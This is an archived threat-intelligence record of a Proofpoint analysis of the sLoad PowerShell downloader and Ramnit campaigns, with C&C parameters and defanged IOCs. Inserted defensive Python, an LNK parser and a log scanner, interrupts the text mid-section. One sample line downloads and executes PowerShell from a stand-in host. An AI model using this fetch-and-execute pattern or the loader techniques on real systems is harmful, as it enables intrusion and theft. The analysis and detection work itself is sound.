{
	"id": "9a05a49d-a590-4eac-ab39-748cfdf7c8c2",
	"created_at": "2026-04-06T00:09:54.263899Z",
	"updated_at": "2026-04-10T03:36:00.155539Z",
	"deleted_at": null,
	"sha1_hash": "f1b0a2520a977d3871141cd99e3ffd9d3c5f341d",
	"title": "sLoad and Ramnit pairing in sustained campaigns against UK and Italy | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1657101,
	"plain_text": "sLoad and Ramnit pairing in sustained campaigns against UK and Italy\r\n| Proofpoint US\r\nBy Proofpoint Staff, October 23, 2018\r\nPublished: 2018-10-23 · Archived: 2026-04-05 14:58:35 UTC\r\nEditor's note: This post has been updated to reflect a change in TTPs for the actor that occurred after the original blog was finalized.\r\nOverview\r\nSince May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers the Ramnit banking Trojan and includes noteworthy reconnaissance features. The malware gathers information about the infected system, including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots, check the DNS cache for specific domains (e.g., targeted banks), and load external binaries. In this post we will:\r\nIntroduce sLoad\r\nDescribe sLoad campaigns by an actor with a long history of activity, including the personalization of email messages with the recipient's name and address\r\nCover geographic targeting of the UK, Italy, and Canada, particularly via geofencing, which is performed at multiple points in the infection chain.\r\nDelivery\r\nWhile initial versions of sLoad appeared in May 2018, we have been tracking campaigns from this actor (internally named TA554) since at least the beginning of 2017. Other researchers have also noticed some of these campaigns [2][3][4]. The following figure shows a snapshot of the actor’s recent activity, starting slightly before the introduction of sLoad.\r\nhttps://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy\r\nPage 1 of 15\n\nFigure 1: Snapshot of TA554’s recent activity\r\nHistorically, this actor has targeted Italy, Canada, and the United Kingdom, specifically sending malicious emails to recipients in these countries. 
The emails are crafted in the targeted country’s language and are often personalized to include recipients’ names and addresses in various parts of the email, such as the body and the subject. TA554 frequently uses package delivery or order notification lures; the emails contain URLs linking to zipped LNK files or zipped documents. The LNK file or document macros in turn download the next stage, typically a PowerShell script, which may download the final payload or another downloader such as sLoad.\r\nFigure 2: Email targeting Italian recipients on October 14, 2018\r\nFigure 3: Email targeting United Kingdom recipients on October 11, 2018. This email was personalized to include the recipient’s name and address\r\nThe actor frequently, but not always, uses one or more intermediate downloaders, such as an as-yet-unnamed PowerShell script, sLoad, Snatch [1], or Godzilla. We have observed final payloads including Ramnit, Gootkit, DarkVNC, Ursnif, and PsiXBot.\r\nGeofencing, that is, restricting access to content based on the user’s location as determined from the source IP address, is performed at every step of the infection chain. For example, we observed checks being performed at:\r\n1. Download of the zipped LNK\r\n2. LNK downloading PowerShell\r\n3. PowerShell downloading sLoad\r\n4. sLoad communications with its command and control (C\u0026C)\r\n5. 
sLoad receiving a task/command (base64-encoded binary)\r\nSteps 2 and 5 are additionally “header-fenced”, meaning that, in addition to the source IP check, the request headers must match those sent by BITS (Background Intelligent Transfer Service); a request made with a browser or a generic HTTP client is not served the content.\r\nMalware Analysis\r\nOverview\r\nFigure 4 shows an overview of the network traffic in this infection chain.\r\nFigure 4: The full infection chain on October 17, starting from the user’s click on a link in a malicious email, to the download of PowerShell and sLoad, to subsequent sLoad C\u0026C traffic\r\nThe main elements of the infection chain are detailed below:\r\nLine 1: the initial user click on the URL in the email, resulting in the download of a zipped LNK (a Windows shortcut file [5]) from invasivespecies[.]us\r\nLine 3: the LNK, which was run by the user, downloads the next stage (PowerShell) from hotkine[.]com/otki2/kine\r\nLine 5: PowerShell downloads sLoad (from lookper[.]eu/userfiles/p2.txt)\r\nLine 7: PowerShell downloads a file containing the sLoad C\u0026C hosts (from lookper[.]eu/userfiles/h2.txt)\r\nLines 8-9: sLoad initial beacon\r\nLines 10-11: sLoad reporting infected system information and polling for commands\r\nLine 13: sLoad downloading Ramnit after receiving a command to do so. Note that we have observed extended waits, more than one day, until sLoad receives a command to download the next stage\r\nLine 14: sLoad sending screenshots to the C\u0026C\r\nLNK\r\nTypically, when we see LNK files used as the first-stage downloader, they point to a PowerShell command that performs the download, all inside the link target field. With files like this, it is easy to extract and analyze the PowerShell command. 
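The parser below is an added example, not code from the Proofpoint post or from the actor’s tooling. It walks a Windows shortcut to its TerminalBlock the way Windows does and returns the StringData (for an ordinary malicious LNK the PowerShell command sits in the arguments field); for the appended-data trick described later in this section it also returns whatever follows the TerminalBlock and carves the text after a marker string, which is what the actor’s findstr-based carving script does, but without executing anything. The sample shortcut, its arguments and the “mrekikaso”-marked payload are constructed here, and the ANSI code page of a non-Unicode shortcut is assumed to be Latin-1.

```python
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex('0114020000000000c000000000000046')  # 00021401-0000-0000-C000-000000000046

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_DATA = (  # (flag, name) in the order the StringData fields appear in the file
    (0x04, 'name'), (0x08, 'relative_path'), (0x10, 'working_dir'),
    (0x20, 'arguments'), (0x40, 'icon_location'),
)


def parse_lnk(data):
    # Walk header -> LinkTargetIDList -> LinkInfo -> StringData -> ExtraData and stop
    # where Windows does: right after the TerminalBlock. Returns the decoded StringData,
    # the end offset and any trailing bytes, which a legitimately created shortcut lacks.
    def u16(off):
        return struct.unpack_from('<H', data, off)[0]

    def u32(off):
        return struct.unpack_from('<I', data, off)[0]

    if len(data) < LNK_HEADER_SIZE or u32(0) != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError('not a Shell Link: bad HeaderSize or LinkCLSID')
    try:
        flags = u32(0x14)
        pos = LNK_HEADER_SIZE
        if flags & HAS_LINK_TARGET_ID_LIST:
            pos += 2 + u16(pos)            # IDListSize does not count its own two bytes
        if flags & HAS_LINK_INFO:
            pos += u32(pos)                # LinkInfoSize counts the whole structure
        # ANSI shortcuts use the system code page; Latin-1 is an assumption for this example
        char_size, codec = (2, 'utf-16-le') if flags & IS_UNICODE else (1, 'latin-1')
        strings = {}
        for flag, name in STRING_DATA:
            if flags & flag:
                count = u16(pos)
                pos += 2
                strings[name] = data[pos:pos + count * char_size].decode(codec, 'replace')
                pos += count * char_size
        while True:                        # ExtraData: BlockSize-prefixed blocks; size < 4 is the TerminalBlock
            size = u32(pos)
            pos += 4
            if size < 4:
                break
            pos += size - 4
    except struct.error:
        raise ValueError('truncated Shell Link')
    return {'strings': strings, 'end': pos, 'appended': data[pos:]}


def carve_after_marker(data, marker):
    # What the Target: command does with findstr, done statically: return the text
    # that follows the marker inside the region after the TerminalBlock, or None.
    tail = parse_lnk(data)['appended']
    idx = tail.find(marker)
    return None if idx < 0 else tail[idx + len(marker):].decode('utf-8', 'replace').strip()


def build_sample_lnk(arguments, appended=b''):
    # Constructed sample: minimal shortcut (no IDList or LinkInfo, Unicode
    # COMMAND_LINE_ARGUMENTS, one dummy ExtraData block, TerminalBlock) plus `appended`.
    flags = 0x20 | IS_UNICODE
    header = struct.pack('<I', LNK_HEADER_SIZE) + LNK_CLSID + struct.pack('<I', flags)
    header += bytes(LNK_HEADER_SIZE - len(header))
    string_data = struct.pack('<H', len(arguments)) + arguments.encode('utf-16-le')
    extra_block = struct.pack('<II', 16, 0xA0000009) + bytes(8)   # BlockSize counts itself
    return header + string_data + extra_block + bytes(4) + appended


MARKER = b'mrekikaso'
# Stand-ins for the obfuscated carving script and the hidden stage (constructed, not the real samples)
SAMPLE_TARGET = 'cmd.exe /c findstr mrekikaso *.lnk'
SAMPLE_PAYLOAD = MARKER + b'$u=hxxp://next-stage.invalid/kine;iex (New-Object Net.WebClient).DownloadString($u)'
SAMPLE_LNK = build_sample_lnk(SAMPLE_TARGET, SAMPLE_PAYLOAD)

if __name__ == '__main__':
    info = parse_lnk(SAMPLE_LNK)
    print('arguments :', info['strings'].get('arguments'))
    print('lnk bytes :', info['end'], ' appended bytes:', len(info['appended']))
    print('carved    :', carve_after_marker(SAMPLE_LNK, MARKER))
```

Run it on a real sample with parse_lnk(open(path, 'rb').read()); a non-empty appended region on a shortcut that arrived by email is a strong indicator in itself, whatever marker the carving script happens to use.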
For example, on Windows this can be done manually by right-clicking the shortcut file, selecting Properties, and reading the command in the “Target:” box.\r\nLess commonly, data can be appended to the end of a LNK file after the terminal block (four NULL bytes) [7], because Windows stops reading the LNK once it sees the terminal block. So it is possible to add [malicious] data to the end of the file which can then be parsed externally, using PowerShell, certutil, or other tools, to execute code. We have observed this used to hide long series of commands, as described in [6].\r\nIn our case, the additional commands are appended after the end of the LNK file. Hence, the link target field contains only a short “carving script” that finds and executes the commands located after the end of the LNK. The actual LNK is 1528 bytes long, and an additional 1486 bytes of PowerShell code is added at the end.\r\nFigure 5: Screenshot of the example LNK properties\r\nThe “Target:” field contains an obfuscated command that uses “findstr” (“nwfxdrtsdnif” reversed), a Windows grep-like command, to find the malicious code appended at the end of the LNK file, which is marked with the string “mrekikaso”.\r\nFigure 6: This screenshot shows the PowerShell code appended after the end of the LNK. This code performs the download of the next stage (more PowerShell)\r\nsLoad Downloader\r\nThe LNK downloads a small, unnamed PowerShell script which itself has a few notable features:\r\nIt checks whether any security processes are running on the system and exits if any are found\r\nDownloads sLoad (e.g., from lookper[.]eu/userfiles/p2.txt) and stores it encrypted with a hardcoded key as “config.ini”\r\nDownloads the sLoad C\u0026C hosts file (e.g. 
from lookper[.]eu/userfiles/h2.txt) and stores it encrypted with a hardcoded key as “web.ini”\r\nUses a Scheduled Task to execute sLoad\r\nFigure 7: PowerShell (sLoad downloader) searching for security tools prior to performing any further action\r\nsLoad\r\nsLoad is also written in PowerShell. The version analyzed here is 5.07b, the latest at the time of the analysis (a 5.08b build was observed shortly afterwards; see Table 3). It includes noteworthy features such as:\r\nCollection of information to report to the C\u0026C server, including:\r\nA list of running processes\r\nPresence of .ICA files on the system (likely Citrix-related)\r\nWhether an Outlook folder is present on the system\r\nAdditional reconnaissance data\r\nThe ability to take screenshots\r\nChecking the DNS cache for specific domains (e.g., targeted banks)\r\nLoading external binaries\r\nsLoad’s network communication begins with an initial C\u0026C beacon to the path “/img.php?ch=1”, which is an empty request. It may receive an “sok” from the server.\r\nAfter the initial beacon, sLoad enters a loop in which it pushes extensive information about the victim’s system to the C\u0026C, expects and executes commands from the server, and sends screenshots to the server. In this loop, it first performs a request to “captcha.php” and sends information about the infected system via the URL parameters.\r\nTable 1: Breakdown of URL parameters and values in the “captcha.php” request\r\nParameter | Example value | Explanation\r\ng | “pu” | Hardcoded value\r\nc | “0” | If any files with the .ICA extension are found on the system, searched starting from the “C:\\users” folder, this value is “1”; otherwise it is “0”. 
We assume .ICA files are most likely Citrix-related.\r\nid | | System’s UUID, generated with: (Get-WmiObject Win32_ComputerSystemProduct).UUID\r\nv | “Microsoft Windows 7 Ultimate” | OS caption, generated with: (gwmi win32_operatingsystem).caption\r\nc | “GLklWOaPjmVuQiCD” | Random string of 16 upper- and lower-case letters, generated for each such request\r\na | “*armsvc*cmd*cmd*conhost” | “*”-separated list of running processes\r\nd | | Counts the number of computers in the current domain or network. This parameter may be empty if there are none, or can have a value such as “{in network:1}”\r\nn | “MARK-PC” | Computer name, generated with: $env:ComputerName\r\nbu | “*nwolb.com*barclays.co.uk” | “*”-separated list of hostnames from the system’s DNS cache that match the hostnames in a hardcoded list of targeted banks\r\ncpu | “Intel(R) Core(TM) i5-780HQ CPU @ 2.91GHz” | System processor information\r\no | “0” | If \"\\..\\Microsoft\\Outlook\\\" (relative to the current working directory) exists then “1”, else “0”\r\nsLoad reads and saves the server’s response to the “captcha.php” request. If any response is returned, sLoad checks it and acts upon it. The response can begin with:\r\nTable 2: Explanation of possible responses from the C\u0026C to the “captcha.php” request\r\nServer response (begins with) | Explanation\r\n“run=” | Followed by a URL which is downloaded and its PowerShell content executed\r\n“updateps=” | Followed by a URL which is downloaded and its PowerShell content saved. Essentially this implements the “update self” functionality. 
The contents of the file storing sLoad on disk are replaced, and the current sLoad instance is stopped\r\nAny other response with length greater than 3 | Expected to be a URL whose content is downloaded, decoded with “certutil” (base64), and saved as an executable, at which point the executable is started\r\nNear the end of the main loop, sLoad uploads the screenshots it took of the victim’s desktop to the “p.php” URI. sLoad then sleeps for 10 minutes before it polls the server again for commands and uploads additional screenshots.\r\nFigure 8: sLoad posting a screenshot to its C\u0026C\r\nFigure 9: sLoad contains a hardcoded array of banking keywords and hostnames (in this instance, for Italian banks). It compares the infected machine’s DNS cache to this list, and reports any matches to the C\u0026C in the “bu” parameter.\r\nFigure 10: sLoad contains a hardcoded array of banking keywords and hostnames (in this instance, for UK banks). It compares the infected machine’s DNS cache to this list, and reports any matches to the C\u0026C in the “bu” parameter.\r\nFigure 11: sLoad searching for files with the .ICA extension, starting in the “C:\\users” folder. 
We assume these are most likely Citrix-related, because the .ICA format is used as a configuration file for Citrix application servers and because of the “$cit” variable name.\r\nsLoad Versions\r\nSince May 2018 we have observed multiple versions of sLoad, which introduced incremental changes.\r\nTable 3: sLoad versions observed\r\nVersion | Date observed\r\n0.01b | 2018-05-01\r\n2.01b | 2018-05-09\r\n2.11b | 2018-05-12\r\n2.37b | 2018-06-06\r\n3.47b | 2018-06-26\r\n4.07b | 2018-08-23\r\n5.07b | 2018-09-20\r\n5.08b | 2018-10-03\r\nWe were also able to observe control panels for a number of these versions (Figures 12-15).\r\nFigure 12: Screenshot of the C\u0026C panel, version 0.01b\r\nFigure 13: Screenshot of the C\u0026C panel, version 2.01b\r\nFigure 14: Screenshot of the C\u0026C panel, version 2.37b\r\nFigure 15: Screenshot of the C\u0026C panel, version 4.07b\r\nUpdated October 23, 2018 - New TTP\r\nOn October 22, 2018, the actor added a victim-facing landing page at the zipped-LNK download step [8] (Figure 16). In this case, the LNK downloaded sLoad directly, without the additional intermediate PowerShell.\r\nFigure 16: New victim-facing landing page\r\nConclusion\r\nProofpoint researchers identified yet another stealthy downloader, this time paired with personalized email lures and sophisticated geofencing. 
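As an added example of turning the C\u0026C behaviour in Tables 1 and 2, the BITS header fencing of steps 2 and 5, and the URL IOCs listed below into detection logic (this is not Proofpoint’s code and not part of the original post), the Python scanner below runs three kinds of rule over a few constructed proxy-log lines: an IOC match on the post’s own URLs, URL-shape rules for the /img.php?ch=1 beacon, the /captcha.php?g=pu check-in (whose parameters it decodes so the analyst sees the reported processes and bank hostnames) and the /p.php screenshot upload, and a rule for Microsoft BITS user-agent downloads from hosts outside an allowlist. The log format, the allowlist and the sample lines are assumptions made for the example.

```python
from urllib.parse import urlsplit, parse_qs

# URL IOCs from the post, kept defanged as published
KNOWN_URLS = {
    'hxxps://invasivespecies[.]us/htmlTicket-access/ticket-T559658356711702',
    'hxxps://davidharvill[.]org/htmlTicket-access/ticket-V081650502356',
    'hxxps://schwerdt[.]org/htmlTicket-access/ticket-823624156690858',
    'hxxps://hotkine[.]com/otki2/kine',
    'hxxps://lookper[.]eu/userfiles/p2.txt',
    'hxxps://lookper[.]eu/userfiles/h2.txt',
    'hxxps://maleass[.]eu/images//img.php?ch=1',
    'hxxps://informanetwork[.]com/update/thrthh.txt',
}
# Hosts a BITS client is expected to talk to; an assumption to tune per environment
BITS_ALLOWED_SUFFIXES = ('.windowsupdate.com', '.microsoft.com', '.windows.com')


def refang(url):
    return url.replace('hxxp', 'http', 1).replace('[.]', '.')


KNOWN_URLS_REFANGED = {refang(u) for u in KNOWN_URLS}


def parse_line(line):
    # Constructed log format: time | client | method | url | user-agent
    ts, client, method, url, ua = [f.strip() for f in line.split(' | ', 4)]
    return {'ts': ts, 'client': client, 'method': method, 'url': refang(url), 'ua': ua}


def decode_checkin(query):
    # Turn the captcha.php parameters (Table 1) into analyst-readable fields
    q = parse_qs(query, keep_blank_values=True)

    def first(k):
        return q.get(k, [''])[0]

    def star_list(k):
        return [x for x in first(k).split('*') if x]

    return {
        'uuid': first('id'), 'os': first('v'), 'hostname': first('n'), 'cpu': first('cpu'),
        'processes': star_list('a'),
        'bank_hosts_in_dns_cache': star_list('bu'),
        'outlook_present': first('o') == '1',
        'network': first('d'),
        'c_values': q.get('c', []),   # the post lists c twice (.ICA flag and a random string)
    }


def classify(rec):
    # Per-request rules for the sLoad C2 loop and for the BITS header-fenced stages
    u = urlsplit(rec['url'])
    host, path, q = (u.hostname or ''), u.path.lower(), parse_qs(u.query)
    alerts = []
    if rec['url'] in KNOWN_URLS_REFANGED:
        alerts.append(('ioc_match', rec['url']))
    if path.endswith('/img.php') and q.get('ch') == ['1']:
        alerts.append(('sload_beacon', host))
    elif path.endswith('/captcha.php') and q.get('g') == ['pu']:
        alerts.append(('sload_checkin', decode_checkin(u.query)))
    elif path.endswith('/p.php') and rec['method'] == 'POST':
        alerts.append(('sload_screenshot_upload', host))   # weak alone; correlated in scan_log
    if rec['ua'].startswith('Microsoft BITS/') and not host.endswith(BITS_ALLOWED_SUFFIXES):
        alerts.append(('bits_download_unusual_host', host))
    return alerts


def scan_log(lines):
    # Returns (line_no, rule, detail) tuples. The p.php rule only fires for a client
    # that has already been seen sending the /img.php?ch=1 beacon.
    alerts, beaconing = [], set()
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        for rule, detail in classify(rec):
            if rule == 'sload_beacon':
                beaconing.add(rec['client'])
            if rule == 'sload_screenshot_upload' and rec['client'] not in beaconing:
                continue
            alerts.append((n, rule, detail))
    return alerts


# Constructed proxy-log lines modelled on the October 17 chain, plus benign traffic
SAMPLE_LOG = [
    '2018-10-17T09:01:02Z | 10.20.30.40 | GET | hxxps://hotkine[.]com/otki2/kine | Microsoft BITS/7.8',
    '2018-10-17T09:01:05Z | 10.20.30.40 | GET | hxxps://lookper[.]eu/userfiles/p2.txt | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-17T09:01:06Z | 10.20.30.40 | GET | hxxps://lookper[.]eu/userfiles/h2.txt | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-17T09:01:30Z | 10.20.30.40 | GET | hxxps://maleass[.]eu/images//img.php?ch=1 | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-17T09:01:31Z | 10.20.30.40 | GET | hxxps://maleass[.]eu/images//captcha.php?g=pu&c=0&id=4C4C4544-0042-3810-8031-C4C04F4A3132&v=Microsoft+Windows+7+Ultimate&c=GLklWOaPjmVuQiCD&a=*armsvc*cmd*cmd*conhost&d=&n=MARK-PC&bu=*nwolb.com*barclays.co.uk&cpu=Intel+Core+i5&o=0 | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-17T09:11:40Z | 10.20.30.40 | POST | hxxps://maleass[.]eu/images//p.php | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-18T10:00:00Z | 10.20.30.40 | GET | hxxps://informanetwork[.]com/update/thrthh.txt | Microsoft BITS/7.8',
    '2018-10-17T09:00:00Z | 10.20.30.41 | GET | http://download.windowsupdate.com/c/msdownload/update.cab | Microsoft BITS/7.8',
    '2018-10-17T09:00:01Z | 10.20.30.41 | GET | https://www.example.com/index.html | Mozilla/5.0 (Windows NT 6.1)',
    '2018-10-17T09:00:02Z | 10.20.30.41 | POST | https://www.example.com/p.php | Mozilla/5.0 (Windows NT 6.1)',
]

if __name__ == '__main__':
    for n, rule, detail in scan_log(SAMPLE_LOG):
        print(n, rule, detail)
```

The p.php rule is deliberately weak on its own and only fires once the same client has been seen beaconing; the BITS allowlist needs tuning to whatever update and CDN hosts an environment legitimately pulls from, otherwise the header-fenced stages hide among ordinary BITS traffic.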
sLoad, like other downloaders we have profiled recently, fingerprints infected systems, allowing threat actors to better choose targets of interest for the payloads of their choice. In this case, the final payload is generally a banking Trojan, via which the actors can not only steal additional data but also perform man-in-the-browser attacks on infected individuals. Downloaders like sLoad, Marap, and others provide threat actors a high degree of flexibility, whether for avoiding vendor sandboxes, delivering ransomware to a system that appears mission critical, or delivering a banking Trojan to the systems with the most likely return.\r\nReferences\r\n[1] https://asert.arbornetworks.com/snatchloader-reloaded/\r\n[2] https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/\r\n[3] https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/\r\n[4] http://blog.dynamoo.com/2017/02/highly-personalised-malspam-making.html\r\n[5] https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n[6] https://www.uperesia.com/booby-trapped-shortcut-generator\r\n[7] https://lifeinhex.com/analyzing-malicious-lnk-file/\r\n[8] https://twitter.com/ps66uk/status/1054706165878321152\r\nIndicators of Compromise (IOCs)\r\nIOC | Type | Description\r\nhxxps://invasivespecies[.]us/htmlTicket-access/ticket-T559658356711702 | URL | URL in email - 2018-10-17\r\nhxxps://davidharvill[.]org/htmlTicket-access/ticket-V081650502356 | URL | URL in email - 2018-10-17\r\nhxxps://schwerdt[.]org/htmlTicket-access/ticket-823624156690858 | URL | URL in email - 2018-10-17\r\n5ea968cdefd2faabb3b4380a3ff7cb9ad21e03277bcd327d85eb87aaeecda282 | SHA256 | ticket-T559658356711702.zip - 2018-10-17\r\nhxxps://hotkine[.]com/otki2/kine | URL | Zipped LNK gets PowerShell - 
2018-10-17\r\na446afb6df85ad7819b90026849a72de495f2beed1da7dcd55c09cd33669d416 | SHA256 | kine - ps1 - 2018-10-17\r\nhxxps://lookper[.]eu/userfiles/p2.txt | URL | PowerShell gets sLoad - 2018-10-17\r\nhxxps://lookper[.]eu/userfiles/h2.txt | URL | PowerShell gets sLoad hosts file - 2018-10-17\r\n79233b83115161065e51c6630634213644f97008c4da28673e7159d1b4f50dc2 | SHA256 | p2.txt sLoad - GBR - 2018-10-17\r\n245c12a6d3d43420883a688f7e68e7164b3dda16d6b7979b1794cafd58a34d6d | SHA256 | h2.txt sLoad hosts - GBR - 2018-10-17\r\nhxxps://maleass[.]eu/images//img.php?ch=1 | URL | sLoad C\u0026C - 2018-10-17\r\nhxxps://informanetwork[.]com/update/thrthh.txt | URL | sLoad payload (Ramnit) - 2018-10-17\r\nb1032db65464a1c5a18714ce3541fca3c82d0a47fb2e01c31d7d4c3d5ed60040 | SHA256 | Ramnit - 2018-10-17\r\nxohrikvjhiu[.]eu / 185.197.75.35 | DOMAIN / IP | Ramnit C\u0026C - 2018-10-17\r\nET and ETPRO Suricata/Snort Signatures\r\n2830633 || ETPRO TROJAN sLoad CnC Checkin M2\r\n2830632 || ETPRO TROJAN sLoad CnC Checkin\r\n2018856 || ET TROJAN Windows executable base64 encoded\r\nSource: https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
	],
	"report_names": [
		"sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
	],
	"threat_actors": [
		{
			"id": "a3808e4f-c7fd-4d25-aa84-aacc27061826",
			"created_at": "2023-01-06T13:46:39.316216Z",
			"updated_at": "2026-04-10T02:00:03.285437Z",
			"deleted_at": null,
			"main_name": "TA554",
			"aliases": [
				"TH-163"
			],
			"source_name": "MISPGALAXY:TA554",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9be98f84-4a93-41c7-90bd-3ea66ba5bfd7",
			"created_at": "2022-10-25T16:07:24.581954Z",
			"updated_at": "2026-04-10T02:00:05.040995Z",
			"deleted_at": null,
			"main_name": "TA554",
			"aliases": [
				"TH-163"
			],
			"source_name": "ETDA:TA554",
			"tools": [
				"DarkVNC",
				"Godzilla",
				"Godzilla Loader",
				"Gootkit",
				"Gootloader",
				"Gozi ISFB",
				"ISFB",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Nimnul",
				"Pandemyia",
				"PsiX",
				"PsiXBot",
				"Ramnit",
				"StarsLord",
				"Waldek",
				"Xswkit",
				"sLoad",
				"talalpek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.pdf",
		"text": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.txt",
		"img": "https://archive.orkl.eu/f1b0a2520a977d3871141cd99e3ffd9d3c5f341d.jpg"
	}
}